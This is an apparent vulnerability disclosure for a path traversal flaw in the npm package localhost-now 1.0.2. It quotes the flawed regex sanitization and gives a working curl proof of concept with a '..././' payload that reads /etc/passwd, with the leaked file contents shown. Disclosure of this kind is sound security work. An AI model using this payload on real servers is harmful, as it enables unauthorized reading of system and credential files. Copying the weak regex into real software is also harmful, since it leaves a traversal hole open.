Hi guys,
i can bypass url filter in localhost-now module.
It allows to read content of arbitrary files on the remote server.
module name: localhost-nowversion:1.0.2npm page: https://www.npmjs.com/package/localhost-now
26 downloads in the last week
Lack of file path sanitization by using the regex method causes that any file on the server might be read by malicious user
ex: input: url = …/./etc/passwd
when the url calls replace(/(..[/\])+/g, ‘’) and then …/ will be removed -> final result: url = …/etc/passwd. (same in windows for ...\.\
)
// /localhost-now/lib/app.js, line 17:
const file = url === '/' ? '/index.html' : url.replace(/(\.\.[\/\\])+/g, '')
localhost-now
:npm install localhost-now
localhost-now
in your directoryroot@kali:/var/www/html/localhost-now/bin# nodejs localhost
Web Server started on localhost:1337
curl -v --path-as-is http://127.0.0.1:1337/..././..././..././..././..././etc/passwd
* Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 1337 (#0)
> GET /..././..././..././..././..././etc/passwd HTTP/1.1
> Host: 127.0.0.1:1337
> User-Agent: curl/7.50.1
> Accept: */*
>
< HTTP/1.1 200 OK
< content-type: text/
< Date: Mon, 09 Apr 2018 09:04:13 GMT
< Connection: keep-alive
< Content-Length: 2908
<
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
thanks you
This vulnerability might be used to read content of any file on the server